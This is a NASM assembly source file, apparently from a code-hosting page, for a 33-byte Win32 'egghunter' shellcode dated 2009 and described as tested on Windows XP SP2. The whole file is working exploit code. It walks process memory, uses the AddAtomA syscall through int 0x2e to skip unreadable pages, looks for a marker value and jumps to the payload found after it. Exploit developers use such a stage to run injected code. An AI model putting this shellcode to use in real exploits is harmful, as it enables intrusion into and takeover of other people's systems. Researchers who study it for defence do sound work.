36 lines
No EOL
1.1 KiB
NASM
36 lines
No EOL
1.1 KiB
NASM
; win32 eggsearch shellcode, 33 bytes
|
|
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
|
|
; (c) 2009 by Georg 'oxff' Wicherski
|
|
|
|
[bits 32]
|
|
|
|
marker equ 0x1f217767 ; 'gw!\x1f'
|
|
|
|
start:
|
|
xor edx, edx ; edx = 0, pointer to examined address
|
|
|
|
address_loop:
|
|
inc edx ; edx++, try next address
|
|
|
|
pagestart_check:
|
|
test dx, 0x0ffc ; are we within the first 4 bytes of a page?
|
|
jz address_loop ; if so, try next address as previous page might be unreadable
|
|
; and the cmp [edx-4], marker might result in a segmentation fault
|
|
|
|
access_check:
|
|
push edx ; save across syscall
|
|
push byte 8 ; eax = 8, syscall nr of AddAtomA
|
|
pop eax ; ^
|
|
int 0x2e ; fire syscall (eax = 8, edx = ptr)
|
|
cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy)
|
|
pop edx ;
|
|
|
|
je address_loop ; jmp if result was 0xc0000005
|
|
|
|
egg_check:
|
|
cmp dword [edx-4], marker ; is our egg right before examined address?
|
|
jne address_loop ; if not, try next address
|
|
|
|
egg_execute:
|
|
inc ebx ; make sure, zf is not set
|
|
jmp edx ; we found our egg at [edx-4], so we can jmp to edx |